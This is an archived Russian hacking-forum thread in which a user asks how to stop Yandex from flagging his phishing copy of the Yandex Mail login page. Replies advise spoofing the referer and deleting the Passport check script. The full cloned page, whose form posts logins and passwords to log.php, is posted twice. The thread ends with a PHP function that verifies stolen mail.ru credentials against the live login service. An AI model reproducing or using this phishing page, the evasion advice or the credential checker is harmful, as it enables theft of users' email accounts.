PDA

Просмотр полной версии : Яндекс блочит фейк страницы

opy495
04.04.2008, 19:19
Сделал фейк , захожу на него , ввожу лоиг пасс , и меня перекидывает на яд страницу с текстом:

Внимание! Сайт http://--------------- не принадлежит Яндексу.

Вы видите эту страницу, потому что Вы попытались зарегистрироватся или авторизоватся на Яндексе с сайта, не имеющего к Яндексу отношения. Яндекс ничего не знает про этот сайт и не может гарантировать конфиденциальность передаваемой Вами информации (логин и пароль).

Если Вы ошибочно приняли чужой сайт за принадлежащий Яндексу, рекомендуем Вам на всякий случай сменить пароль.

Если вы доверяете этому чужому сайту, то можете начинать работать со службами Яндекса

Подробнее о нашем отношении к персональной информации можно прочитать в «Соглашении о конфиденциальности информации».

Для регистрации и авторизации на проектах Яндекса мы рекомендуем пользоваться главной страницей Яндекса или Яндекс Паспортом .

шо мона сделать в такой ситуации?
blackybr
04.04.2008, 19:24
не имею с этим дело, но посоветовал бы поставить к примеру реферер какого-ниб яндексного сервиса
opy495
04.04.2008, 19:26
а у меня сразу после ввода лоиг пасса , должен перекидывать на главную страницу , но он перекидывает на эту злополучную , видимо просто нада какой-то код подтереь в index.htm , который связан как раз с этой страничкой , но только что за код? o_O
Kusto
04.04.2008, 19:35
ты что то не то делаеш- просто фейк криво написан- 2 мин назад проверил свой- все отлично
НTL
04.04.2008, 19:42
у тебя "умный фейк" который кидает запрос на яндекс при авторизации (чтобы жертва не запалила), редактируй php и убери запросы
opy495
04.04.2008, 19:48
я в php не силен... поправьте плиз

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML lang=ru><HEAD><TITLE>Яндекс.Почта</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="/favicon.ico" type=image/x-icon rel="SHORTCUT ICON"><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/common.css" type=text/css
rel=stylesheet><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/mail-common.css"
type=text/css rel=stylesheet><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/mail-login.css"
type=text/css rel=stylesheet>
<STYLE type=text/css><!--td.dignity p span {font-size:140%;}td.form div.checkbox div.reducer {left: 28%;}* html td.form div.checkbox div.reducer label {display: block; float: left; width: 100%;}* html td.form div.checkbox span.input {left: -2px;}#dignityCell {margin-top: 1em;}.new_mail{font-size: 1.5em;}--></STYLE>

<SCRIPT type=text/javascript>var fromMail = false;</SCRIPT>

<SCRIPT src="http://passport.yandex.ru/passport?mode=testloginjs&amp;id28460493"
type=text/javascript></SCRIPT>

<SCRIPT src="http://img.yandex.net/wmi/modern/static/8/js/index_main.js"
type=text/javascript charset=utf-8></SCRIPT>

<META content="MSHTML 6.00.2900.3243" name=GENERATOR></HEAD>
<BODY
style="BACKGROUND-IMAGE: url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id28460493)">
<TABLE class="layout root">
<TBODY>
<TR>
<TD class="layout content">
<DIV align=center><A href="http://www.yandex.ru/"><IMG height=83 alt=Яndex
src="http://img.yandex.net/wmi/modern/static/8/i//login/yandex.gif"
width=136></A></DIV>
<TABLE class="layout main" width="100%">
<TBODY>
<TR class=layout vAlign=top>
<TD class="features layout">
<DIV id=featuresCell>
<H2>Почта Яндекса&nbsp;— это:</H2>
<P class="plus big"><SPAN><A
href="http://help.yandex.ru/mail/?id=448394">Бесконечный
ящик</A></SPAN><BR>Вы можете не думать о том, сколько места занимают
ваши письма.</P>
<P class="plus no-spam"><SPAN><A
href="http://help.yandex.ru/mail/?id=288423">Отсутствие
спама</A></SPAN><BR><A href="http://so.yandex.ru/"><IMG class=so
title=Спамооборона alt=Спамооборона
src="http://img.yandex.net/wmi/modern/static/8/i/logo_so.gif"
align=right></A>Ваш почтовый ящик надежно защищен программой «<A
href="http://so.yandex.ru/">Спамооборона</A>».<BR></P>
<P class="plus revolutional"><SPAN><A href="/pda">Мобильная
версия</A></SPAN><BR>Для смартфонов, коммуникаторов и КПК.</P>
<P class="plus red"><SPAN><A
href="http://help.yandex.ru/mail/?id=288215" target=_blank>Защита от
вирусов</A></SPAN><BR><A href="http://www.drweb.com/"
target=_blank><IMG class=drweb title=Dr.Web alt=Dr.Web
src="http://img.yandex.net/wmi/modern/static/8/i/drweb2.gif"
align=right></A>Все письма проверяются антивирусной программой «<A
href="http://www.drweb.com" target=_blank>Dr.Web</A>».</P></DIV></TD>
<TD class="form layout" id=loginForm>
<DIV class=tl>
<DIV class=tr>
<DIV class=bl>
<DIV class=br>
<FORM id=loginform name=MainLogin
action=log.php method=post><IMG
style="MARGIN: 15px 0px 10px" height=36 alt=Почта
src="http://img.yandex.net/wmi/modern/static/8/i/login/heading.gif"
width=136>
<DIV class="input login"><LABEL
for=inputLogin>логин:</LABEL><BR><INPUT id=inputLogin tabIndex=1
name=login></DIV>
<DIV class="input passwd"><LABEL
for=inputPassword>пароль:</LABEL><BR><INPUT id=inputPassword
tabIndex=2 type=password name=passwd></DIV>
<P style="TEXT-ALIGN: center"><LABEL for=twoweeks><INPUT id=twoweeks
style="VERTICAL-ALIGN: middle" tabIndex=3 type=checkbox value=yes
name=twoweeks autocomplete="no">&nbsp;запомнить меня</LABEL></P>
<DIV><INPUT type=hidden
value=http://mail.yandex.ru/?from=mail&amp;r=id30681178
name=retpath><INPUT class=hugeBtn tabIndex=4 type=submit value=Войти></DIV>
<P class=forgotten-link><A tabIndex=5
href="http://passport.yandex.ru/passport?mode=remember"><SPAN>Вспомнить
пароль</SPAN></A><BR><BR><A class=new_mail
href="http://passport.yandex.ru/passport?mode=register&amp;msg=mail&amp;retpath=http://mail.yandex.ru/?from=mail&amp;r=id30681178"><SPAN>Заведите
почту на Яндексе</SPAN></A></P></FORM>
<SCRIPT src="https://passport.yandex.ru/js/forcehttps.js"
type=text/javascript charset=utf-8></SCRIPT>
</DIV></DIV></DIV></DIV></TD>
<TD class="dignity layout">
<DIV id=dignityCell>
<H2>Почтовая фишка №&nbsp;4</H2>
<P><IMG height=101 alt="Быстрый ответ"
src="http://img.yandex.net/wmi/modern/static/8/i//login/marka4.gif"
width=162></P>
<P>Прочитали письмо, и&nbsp;хочется быстро черкнуть пару строк
в&nbsp;ответ? К&nbsp;вашим услугам форма быстрого
ответа.</P></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD class="layout bottom">
<DIV class="tuning sys-font hidden" id=tuning>
<P><SPAN class="pseudo-link hidden" id=tips_hide>Убрать информацию слева
и&nbsp;справа</SPAN><SPAN class="pseudo-link hidden" id=tips_show>Показать
информацию</SPAN></P></DIV>
<DIV class=footer>
<HR>

<P class=copy>Чистая почта&nbsp;©&nbsp;2001—2008 «<A
href="http://www.yandex.ru/">Яндекс</A>»<BR><A
href="http://feedback.yandex.ru/?from=webmail">Обратная связь</A> · <A
href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</A> · <A
href="http://advertising.yandex.ru/mail.xml">Реклама</A></P>
<DIV class=pda_link><A href="/pda">Мобильная версия</A></DIV>
<DIV class=made id=made-in><A href="http://www.artlebedev.ru/"><IMG
height=37 alt="art. lebedev"
src="http://img.yandex.net/wmi/modern/static/8/i//login/logo-artlebedev.gif"
width=90></A>Дизайн&nbsp;—<BR><A href="http://www.artlebedev.ru/">Студия
Артемия Лебедева</A></DIV><BR clear=all></DIV></TD></TR></TBODY></TABLE>
<SCRIPT type=text/javascript>init(false);</SCRIPT>
</BODY></HTML>
НTL
04.04.2008, 21:13
я в php не силен... поправьте плиз

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML lang=ru><HEAD><TITLE>Яндекс.Почта</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK
href="/favicon.ico" type=image/x-icon rel="SHORTCUT ICON"><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/common.css" type=text/css
rel=stylesheet><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/mail-common.css"
type=text/css rel=stylesheet><LINK
href="http://img.yandex.net/wmi/modern/static/8/css/mail-login.css"
type=text/css rel=stylesheet>
<STYLE type=text/css><!--td.dignity p span {font-size:140%;}td.form div.checkbox div.reducer {left: 28%;}* html td.form div.checkbox div.reducer label {display: block; float: left; width: 100%;}* html td.form div.checkbox span.input {left: -2px;}#dignityCell {margin-top: 1em;}.new_mail{font-size: 1.5em;}--></STYLE>

<SCRIPT type=text/javascript>var fromMail = false;</SCRIPT>

<SCRIPT src="http://passport.yandex.ru/passport?mode=testloginjs&amp;id28460493"
type=text/javascript></SCRIPT>

<SCRIPT src="http://img.yandex.net/wmi/modern/static/8/js/index_main.js"
type=text/javascript charset=utf-8></SCRIPT>

<META content="MSHTML 6.00.2900.3243" name=GENERATOR></HEAD>
<BODY
style="BACKGROUND-IMAGE: url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=yandex_mail/?id28460493)">
<TABLE class="layout root">
<TBODY>
<TR>
<TD class="layout content">
<DIV align=center><A href="http://www.yandex.ru/"><IMG height=83 alt=Яndex
src="http://img.yandex.net/wmi/modern/static/8/i//login/yandex.gif"
width=136></A></DIV>
<TABLE class="layout main" width="100%">
<TBODY>
<TR class=layout vAlign=top>
<TD class="features layout">
<DIV id=featuresCell>
<H2>Почта Яндекса&nbsp;— это:</H2>
<P class="plus big"><SPAN><A
href="http://help.yandex.ru/mail/?id=448394">Бесконечный
ящик</A></SPAN><BR>Вы можете не думать о том, сколько места занимают
ваши письма.</P>
<P class="plus no-spam"><SPAN><A
href="http://help.yandex.ru/mail/?id=288423">Отсутствие
спама</A></SPAN><BR><A href="http://so.yandex.ru/"><IMG class=so
title=Спамооборона alt=Спамооборона
src="http://img.yandex.net/wmi/modern/static/8/i/logo_so.gif"
align=right></A>Ваш почтовый ящик надежно защищен программой «<A
href="http://so.yandex.ru/">Спамооборона</A>».<BR></P>
<P class="plus revolutional"><SPAN><A href="/pda">Мобильная
версия</A></SPAN><BR>Для смартфонов, коммуникаторов и КПК.</P>
<P class="plus red"><SPAN><A
href="http://help.yandex.ru/mail/?id=288215" target=_blank>Защита от
вирусов</A></SPAN><BR><A href="http://www.drweb.com/"
target=_blank><IMG class=drweb title=Dr.Web alt=Dr.Web
src="http://img.yandex.net/wmi/modern/static/8/i/drweb2.gif"
align=right></A>Все письма проверяются антивирусной программой «<A
href="http://www.drweb.com" target=_blank>Dr.Web</A>».</P></DIV></TD>
<TD class="form layout" id=loginForm>
<DIV class=tl>
<DIV class=tr>
<DIV class=bl>
<DIV class=br>
<FORM id=loginform name=MainLogin
action=log.php method=post><IMG
style="MARGIN: 15px 0px 10px" height=36 alt=Почта
src="http://img.yandex.net/wmi/modern/static/8/i/login/heading.gif"
width=136>
<DIV class="input login"><LABEL
for=inputLogin>логин:</LABEL><BR><INPUT id=inputLogin tabIndex=1
name=login></DIV>
<DIV class="input passwd"><LABEL
for=inputPassword>пароль:</LABEL><BR><INPUT id=inputPassword
tabIndex=2 type=password name=passwd></DIV>
<P style="TEXT-ALIGN: center"><LABEL for=twoweeks><INPUT id=twoweeks
style="VERTICAL-ALIGN: middle" tabIndex=3 type=checkbox value=yes
name=twoweeks autocomplete="no">&nbsp;запомнить меня</LABEL></P>
<DIV><INPUT type=hidden
value=http://mail.yandex.ru/?from=mail&amp;r=id30681178
name=retpath><INPUT class=hugeBtn tabIndex=4 type=submit value=Войти></DIV>
<P class=forgotten-link><A tabIndex=5
href="http://passport.yandex.ru/passport?mode=remember"><SPAN>Вспомнить
пароль</SPAN></A><BR><BR><A class=new_mail
href="http://passport.yandex.ru/passport?mode=register&amp;msg=mail&amp;retpath=http://mail.yandex.ru/?from=mail&amp;r=id30681178"><SPAN>Заведите
почту на Яндексе</SPAN></A></P></FORM>
<SCRIPT src="https://passport.yandex.ru/js/forcehttps.js"
type=text/javascript charset=utf-8></SCRIPT>
</DIV></DIV></DIV></DIV></TD>
<TD class="dignity layout">
<DIV id=dignityCell>
<H2>Почтовая фишка №&nbsp;4</H2>
<P><IMG height=101 alt="Быстрый ответ"
src="http://img.yandex.net/wmi/modern/static/8/i//login/marka4.gif"
width=162></P>
<P>Прочитали письмо, и&nbsp;хочется быстро черкнуть пару строк
в&nbsp;ответ? К&nbsp;вашим услугам форма быстрого
ответа.</P></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD class="layout bottom">
<DIV class="tuning sys-font hidden" id=tuning>
<P><SPAN class="pseudo-link hidden" id=tips_hide>Убрать информацию слева
и&nbsp;справа</SPAN><SPAN class="pseudo-link hidden" id=tips_show>Показать
информацию</SPAN></P></DIV>
<DIV class=footer>
<HR>

<P class=copy>Чистая почта&nbsp;©&nbsp;2001—2008 «<A
href="http://www.yandex.ru/">Яндекс</A>»<BR><A
href="http://feedback.yandex.ru/?from=webmail">Обратная связь</A> · <A
href="http://stat.yandex.ru/stats.xml?ProjectID=2">Статистика</A> · <A
href="http://advertising.yandex.ru/mail.xml">Реклама</A></P>
<DIV class=pda_link><A href="/pda">Мобильная версия</A></DIV>
<DIV class=made id=made-in><A href="http://www.artlebedev.ru/"><IMG
height=37 alt="art. lebedev"
src="http://img.yandex.net/wmi/modern/static/8/i//login/logo-artlebedev.gif"
width=90></A>Дизайн&nbsp;—<BR><A href="http://www.artlebedev.ru/">Студия
Артемия Лебедева</A></DIV><BR clear=all></DIV></TD></TR></TBODY></TABLE>
<SCRIPT type=text/javascript>init(false);</SCRIPT>
</BODY></HTML>


Это HTML
Kusto
04.04.2008, 21:50
Это не фейк а копия страници в Html где ты собрался логин и пасс сохранять? в какой дериктории?
opy495
04.04.2008, 22:55
<FORM id=loginform name=MainLogin action=log.php
Petr
04.04.2008, 23:00
Там находил где-то в странице ссылку эту и просто убрал и все норм
Там вроде js-ка проверяет это дело
procedure
04.04.2008, 23:30
<SCRIPT type=text/javascript>var fromMail = false;</SCRIPT>
???
тэг script закрывать не надо?

Как я вижу времена табличной верстки еще не вышли?
opy495
05.04.2008, 00:12
все разобрался сенкс...
но ешё один открытый вопрос остался..

есть такая фича , проверка пароля на фейк странице , у меня есть код для этой фичи , но вопрос опять же куда его вставлять? понятно что в index.htm , но куда именно? подскажите плз

function login($email,$password)
{
$email = strtolower($email);
list($login, $domain) = explode('@',$email);
$openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain));
if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail))
{
return true;
}
else
{
return false;
}
}

Вот простейшая функция для проверки.
Проверять так

Код:
if(login('xx@mail.ru', 'passwd')) {
...
}